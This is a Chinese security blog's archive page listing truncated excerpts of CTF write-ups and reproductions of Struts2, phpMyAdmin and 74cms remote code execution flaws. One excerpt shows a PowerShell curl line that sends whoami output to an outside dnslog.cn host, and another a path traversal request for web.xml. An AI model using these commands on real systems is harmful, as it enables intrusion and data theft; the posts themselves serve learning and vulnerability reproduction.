2022年3月1日
[De1CTF 2019]ShellShellShell
摘要: [De1CTF 2019]ShellShellShell 查看功能 将login替换为register,出现注册页面,注册admin,提示用户已存在。注册test用户 md5前5位碰撞 import hashlib for i in range(999999,1000000000): a = has 阅读全文
posted @ 2022-03-01 23:34 CabbageJun 阅读(194) 评论(0) 推荐(0) 编辑
S2-007复现分析
摘要: 一、漏洞信息 漏洞信息页面: S2-007 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞类型: RCE(远程代码执行) 受影响组件: Struts 2.0.0 - Struts 2.2.3 漏洞成因: 当配置了验证规则,类型转换出错时, 阅读全文
posted @ 2022-03-01 15:04 CabbageJun 阅读(143) 评论(0) 推荐(0) 编辑
S2-005复现分析
摘要: 一、漏洞信息 漏洞信息页面: S2-005 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞编号: CVE-2010-1870 漏洞类型: RCE(远程代码执行) 受影响组件: Struts 2.0.0 - Struts 2.1.8.1 漏 阅读全文
posted @ 2022-03-01 15:01 CabbageJun 阅读(308) 评论(0) 推荐(0) 编辑
S2-001复现分析
摘要: 一、漏洞信息 漏洞信息页面: S2-001 - Apache Struts 2 Wiki - Apache Software Foundation 漏洞类型: RCE(远程代码执行) 受影响组件: WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 阅读全文
posted @ 2022-03-01 14:57 CabbageJun 阅读(71) 评论(0) 推荐(0) 编辑
2022年2月27日
[网鼎杯 2020 青龙组]filejava
摘要: 查看功能 打开为上传文件 上传一个正常图片 点击下载,查看请求 访问/DownloadServlet?filename=../../../WEB-INF/web.xml,发现存在任意文件下载 web.xml内容 <?xml version="1.0" encoding="UTF-8"?> <web- 阅读全文
posted @ 2022-02-27 19:07 CabbageJun 阅读(478) 评论(0) 推荐(1) 编辑
[强网杯 2019]Upload
摘要: 查看功能 进入页面,有登陆和注册功能 注册账号 登陆发现文件上传功能 上传普通图片normal.gif,查看页面代码 发现文件名被重命名,且后缀被改为png 扫目录发现www.tar.gz,源码泄露,使用tp5框架 源码 目录结构 route.php <?php // + // | ThinkPHP 阅读全文
posted @ 2022-02-27 19:05 CabbageJun 阅读(279) 评论(0) 推荐(0) 编辑
2022年2月14日
DNSlog带外查询
摘要: #Windows powershell curl "$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($(whoami))).Replace('=','AA')).h54w7r.dnslog.cn" #L 阅读全文
posted @ 2022-02-14 20:25 CabbageJun 阅读(255) 评论(0) 推荐(0) 编辑
2021年11月27日
phpMyAdmin 4.8.1 文件包含复现(CVE-2018-12613)
摘要: #环境搭建 在Windows下使用phpstudy搭建 apache版本:2.4.39 php版本:5.6.9 mysql版本:5.7.26 phpmyadmin 4.8.1下载:https://www.exploit-db.com/exploits/50457 使用composer进行安装 #漏洞 阅读全文
posted @ 2021-11-27 15:50 CabbageJun 阅读(170) 评论(0) 推荐(0) 编辑
2021年11月26日
74cms v5.0.1后台RCE复现
摘要: #环境搭建 在Windows下使用phpstudy搭建 apache版本:2.4.39 php版本:5.4.45 mysql版本:5.7.26 cms下载:http://www.74cms.com/download/index.html #漏洞成因 74cms v5.0.1在url.php中以数组键 阅读全文
posted @ 2021-11-26 15:14 CabbageJun 阅读(932) 评论(0) 推荐(0) 编辑
2021年10月25日
md5相同字符串
摘要: URL编码 %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75 阅读全文
posted @ 2021-10-25 23:44 CabbageJun 阅读(633) 评论(0) 推荐(0) 编辑